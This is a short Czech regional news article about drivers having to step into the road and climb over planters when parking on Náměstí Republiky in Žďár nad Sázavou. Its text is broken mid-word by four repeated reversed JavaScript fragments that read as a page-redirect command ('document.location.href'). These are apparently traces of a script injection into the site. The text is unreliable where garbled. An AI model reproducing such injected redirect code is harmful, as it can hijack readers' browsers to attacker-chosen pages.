Rainbow page separator

Řidiči stále musí vystupovat do silnice a přelézat květináče

Pondělí, 12. března 2018

Náměstí Republiky Žďár nad Sázavou

Žďár nad Sázavou / Na problémy při parkování na náměstí Republiky, konkrétně podél státní silnice první třídy číslo 19, která jím prochází, si dlouhodobě stěžují někteří obyvatelé města. Zatím bezvýsledně. Potíž lidé vidí zejména v [„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tom, že řidiči parkující na vyhrazených místech po straně komunikace otevírají dveře aut a vystupují do vozovky, což je problém také pro kolem projíždějící mo[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];toristy, a nepříjemné je i vystupování lidí z aut do zelených ploch, aby se dostali přes květináče oddělující hlavní silnici od zástavby na chodník kolem náměstí.
„Každé řešení má své výhody, ale i nevýhody. O možnosti parkování na náměstí Republiky rozhodla rada města za minulého vedení radnice. V současné době se o zrušení možnosti parkování podél silnice I/19 na náměstí Republiky neuvažuje,“ informoval vedoucí odboru dopravy žďárského městského úřadu Luboš Koubek.